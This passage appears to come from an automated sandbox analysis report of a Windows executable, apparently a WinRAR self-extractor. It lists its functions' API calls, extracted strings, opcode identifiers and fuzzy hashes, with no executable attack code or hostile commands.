                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: ee2e62b9b8a379465b083304b9091d770e227d024ca974dd8d038b904eff6814
                                        • Instruction ID: 51ee02707a0cbe97e5a07c825dfbbea2e644d4c3363611d6f4cb428db0e42f13
                                        • Opcode Fuzzy Hash: ee2e62b9b8a379465b083304b9091d770e227d024ca974dd8d038b904eff6814
                                        • Instruction Fuzzy Hash: F4B1477190024AEFCF29DFA4C8819AEFBF5EF14710B14459AE8056B312E735DA51CB92
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB6FAA
                                        • _wcslen.LIBCMT ref: 00BB7013
                                        • _wcslen.LIBCMT ref: 00BB7084
                                          • Part of subcall function 00BB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BB7AAB
                                          • Part of subcall function 00BB7A9C: GetLastError.KERNEL32 ref: 00BB7AF1
                                          • Part of subcall function 00BB7A9C: CloseHandle.KERNEL32(?), ref: 00BB7B00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3122303884-3508440684
                                        • Opcode ID: fc4cc707b026e3e5393701ec90f4a465dc6746d02390f7b33000b8c195aa2ba4
                                        • Instruction ID: 81692282f510f192efb969c37be37b70b29298e6eb6177f37f7c2c644ad626d8
                                        • Opcode Fuzzy Hash: fc4cc707b026e3e5393701ec90f4a465dc6746d02390f7b33000b8c195aa2ba4
                                        • Instruction Fuzzy Hash: BA41B6B1D48384ABEB21A7749C86FFEB7ECDF44704F0044D6FA55A7182DAB49A448721
                                        APIs
                                          • Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
                                          • Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370
                                        • EndDialog.USER32(?,00000001), ref: 00BCB610
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00BCB637
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00BCB650
                                        • SetWindowTextW.USER32(?,?), ref: 00BCB661
                                        • GetDlgItem.USER32(?,00000065), ref: 00BCB66A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00BCB67E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00BCB694
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        • Opcode ID: 6e3a4b810bb98db57bd4f2b912f9dfe41c18ced747af3359da1f810fed029123
                                        • Instruction ID: d8f5b48e67db101423cc2c389587abf0d92e2dbcaa4956930e3c82a335c3a2e9
                                        • Opcode Fuzzy Hash: 6e3a4b810bb98db57bd4f2b912f9dfe41c18ced747af3359da1f810fed029123
                                        • Instruction Fuzzy Hash: 3F21B132204205BBE6219B76ED4BF7F7BECFB4BB45F014068F601A25A0DB529901D635
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A6EE96F2,00000001,00000000,00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFD99
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE14
                                        • SysAllocString.OLEAUT32(00000000), ref: 00BCFE1F
                                        • _com_issue_error.COMSUPP ref: 00BCFE48
                                        • _com_issue_error.COMSUPP ref: 00BCFE52
                                        • GetLastError.KERNEL32(80070057,A6EE96F2,00000001,00000000,00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE57
                                        • _com_issue_error.COMSUPP ref: 00BCFE6A
                                        • GetLastError.KERNEL32(00000000,?,?,00BBAF6C,ROOT\CIMV2), ref: 00BCFE80
                                        • _com_issue_error.COMSUPP ref: 00BCFE93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        • Opcode ID: 1a425d68cef0cf558c6698435c588541a8ac4de0e1592e4532e7a668c4066b48
                                        • Instruction ID: 2e8e407908fa90d6583f9b19e492528603ad167397c20ea430727a4053f65bef
                                        • Opcode Fuzzy Hash: 1a425d68cef0cf558c6698435c588541a8ac4de0e1592e4532e7a668c4066b48
                                        • Instruction Fuzzy Hash: 1241D971A0025AABCB109F65CC45FBFBBE9EB48B10F1042FEF915E7291DB34990087A5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                        • API String ID: 3519838083-3505469590
                                        • Opcode ID: 2746f0669908a2fcfcb1c45a93daaffe3e0e542cec6b2c28da1fc8101531eda5
                                        • Instruction ID: b2a9259a8aec2cbb1591a2a773e74c68696e5ac320ddae662f4ef317a7046def
                                        • Opcode Fuzzy Hash: 2746f0669908a2fcfcb1c45a93daaffe3e0e542cec6b2c28da1fc8101531eda5
                                        • Instruction Fuzzy Hash: 42714B71A00259AFDF14DFA5CC99DBEB7F9FF48710B140299E512A72A0CBB0AD01CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB9387
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00BB93AA
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00BB93C9
                                          • Part of subcall function 00BBC29A: _wcslen.LIBCMT ref: 00BBC2A2
                                          • Part of subcall function 00BC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BBC116,00000000,.exe,?,?,00000800,?,?,?,00BC8E3C), ref: 00BC1FD1
                                        • _swprintf.LIBCMT ref: 00BB9465
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                        • MoveFileW.KERNEL32(?,?), ref: 00BB94D4
                                        • MoveFileW.KERNEL32(?,?), ref: 00BB9514
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                        • String ID: rtmp%d
                                        • API String ID: 3726343395-3303766350
                                        • Opcode ID: 1fc50f07ff4cf8bdaeff1387e670b81e854be2d8bc069b5fa68b5511d838ab85
                                        • Instruction ID: 43c2310c3522530730c0bbc0c537429cd1ffdec08fc6ebf48cb3e97cfc851349
                                        • Opcode Fuzzy Hash: 1fc50f07ff4cf8bdaeff1387e670b81e854be2d8bc069b5fa68b5511d838ab85
                                        • Instruction Fuzzy Hash: AD413071940258A7DF31EB608C45EFE77FCEF55740F0048E5B649A3152DAB88B898B64
                                        APIs
                                        • __aulldiv.LIBCMT ref: 00BC122E
                                          • Part of subcall function 00BBB146: GetVersionExW.KERNEL32(?), ref: 00BBB16B
                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BC1251
                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BC1263
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BC1274
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1284
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BC1294
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BC12CF
                                        • __aullrem.LIBCMT ref: 00BC1379
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        • Opcode ID: 407db0dfb418bb9a72249f168ba668215d29b5e76f1d43a2358514c0c7667aa4
                                        • Instruction ID: f7d61b84628b41f7d657ad2c1fa0f2e53ad402330a443c14e95ff4ef061e1ec8
                                        • Opcode Fuzzy Hash: 407db0dfb418bb9a72249f168ba668215d29b5e76f1d43a2358514c0c7667aa4
                                        • Instruction Fuzzy Hash: 8B41F5B2508345AFC710DF69C884A6BBBE9FB88714F00892EF596D7211E734E649CB52
                                        APIs
                                        • _swprintf.LIBCMT ref: 00BB2536
                                          • Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5
                                          • Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                        • String ID: ;%u$x%u$xc%u
                                        • API String ID: 3053425827-2277559157
                                        • Opcode ID: 0558c93b57d685af5c1e92e878e2d5e4e49f53f751b4803f5a32db3a45325118
                                        • Instruction ID: c80df8f9cf0f720cfc2895237bad0207413547aa4470ac2a1d0b5d656c6a2870
                                        • Opcode Fuzzy Hash: 0558c93b57d685af5c1e92e878e2d5e4e49f53f751b4803f5a32db3a45325118
                                        • Instruction Fuzzy Hash: 1BF1FB706043405BDF25EB2488D5BFE7BD59FA5300F0805EDED869B243DBE49949C7A2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: </p>$</style>$<br>$<style>$>
                                        • API String ID: 176396367-3568243669
                                        • Opcode ID: accf50a66f9810465ca473d4612f04123f629f35c73d8e0b57fd1076dd582aa6
                                        • Instruction ID: 307b446ea928b1297bcc8a5d940124b5a4f032814042839d5ab95fb29c3ae361
                                        • Opcode Fuzzy Hash: accf50a66f9810465ca473d4612f04123f629f35c73d8e0b57fd1076dd582aa6
                                        • Instruction Fuzzy Hash: 00515C5670036395FB309A199819F7673E0DFB1750F5804BEF9C2EB1C1FB658D458261
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BDFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDF6CF
                                        • __fassign.LIBCMT ref: 00BDF74A
                                        • __fassign.LIBCMT ref: 00BDF765
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BDF78B
                                        • WriteFile.KERNEL32(?,00000000,00000000,00BDFE02,00000000,?,?,?,?,?,?,?,?,?,00BDFE02,00000000), ref: 00BDF7AA
                                        • WriteFile.KERNEL32(?,00000000,00000001,00BDFE02,00000000,?,?,?,?,?,?,?,?,?,00BDFE02,00000000), ref: 00BDF7E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: d3be896dfb59384420e18fca9836b3d949356341e56444c562a35900297dfd88
                                        • Instruction ID: 08b6c37ccd5db52e8121ae05d8c0791c9133fc0e4bf3fcf164fc2e761d10b5ba
                                        • Opcode Fuzzy Hash: d3be896dfb59384420e18fca9836b3d949356341e56444c562a35900297dfd88
                                        • Instruction Fuzzy Hash: 235194B190424A9FCB10CFA4DC85AEEFBF4EF09310F1441AAE556E7351E730AA40CBA1
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00BD2937
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00BD293F
                                        • _ValidateLocalCookies.LIBCMT ref: 00BD29C8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00BD29F3
                                        • _ValidateLocalCookies.LIBCMT ref: 00BD2A48
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 0854b6620820a372a1c0a3e251564b4fea896bb5981f7321b838ee4f2414f4ca
                                        • Instruction ID: 6266cffdf9ef675ae31a16071f145f81bdd665c9938edb5910c1ec0056f053f9
                                        • Opcode Fuzzy Hash: 0854b6620820a372a1c0a3e251564b4fea896bb5981f7321b838ee4f2414f4ca
                                        • Instruction Fuzzy Hash: D641C934A002989FCF10DF68C895A9EFBF5EF54314F1480E6E8195B392E735DA01CB91
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 00BC9EEE
                                        • GetWindowRect.USER32(?,00000000), ref: 00BC9F44
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00BC9FDB
                                        • SetWindowTextW.USER32(?,00000000), ref: 00BC9FE3
                                        • ShowWindow.USER32(00000000,00000005), ref: 00BC9FF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: RarHtmlClassName
                                        • API String ID: 3937224194-1658105358
                                        • Opcode ID: c0b57e07bd214c133594ec55c62d4577eb8aae6a5ffed8672b5658ccc992b48a
                                        • Instruction ID: 3cbd1df7692bc041a2b08bbe34959b24458cad044871b2be40e24f0da4a89a7d
                                        • Opcode Fuzzy Hash: c0b57e07bd214c133594ec55c62d4577eb8aae6a5ffed8672b5658ccc992b48a
                                        • Instruction Fuzzy Hash: B541BC31104204AFDB215F649C4CFAFBBE8FB49709F10859DF809AA152DB34EA05CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 176396367-3743748572
                                        • Opcode ID: 90fed56cd9d7cacce3212816fbb8d33f10a72175c96904389d5438c6de276857
                                        • Instruction ID: b6c857a57482aceca7f1a3055547aa30826539c6a2cca3803d165c79bf93faa0
                                        • Opcode Fuzzy Hash: 90fed56cd9d7cacce3212816fbb8d33f10a72175c96904389d5438c6de276857
                                        • Instruction Fuzzy Hash: 7C313B7264434556FA30AB949C46F7AB3E4EB90720F50449FF486972D1FBA4AD4183A1
                                        APIs
                                          • Part of subcall function 00BDC868: _free.LIBCMT ref: 00BDC891
                                        • _free.LIBCMT ref: 00BDC8F2
                                          • Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
                                          • Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4
                                        • _free.LIBCMT ref: 00BDC8FD
                                        • _free.LIBCMT ref: 00BDC908
                                        • _free.LIBCMT ref: 00BDC95C
                                        • _free.LIBCMT ref: 00BDC967
                                        • _free.LIBCMT ref: 00BDC972
                                        • _free.LIBCMT ref: 00BDC97D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
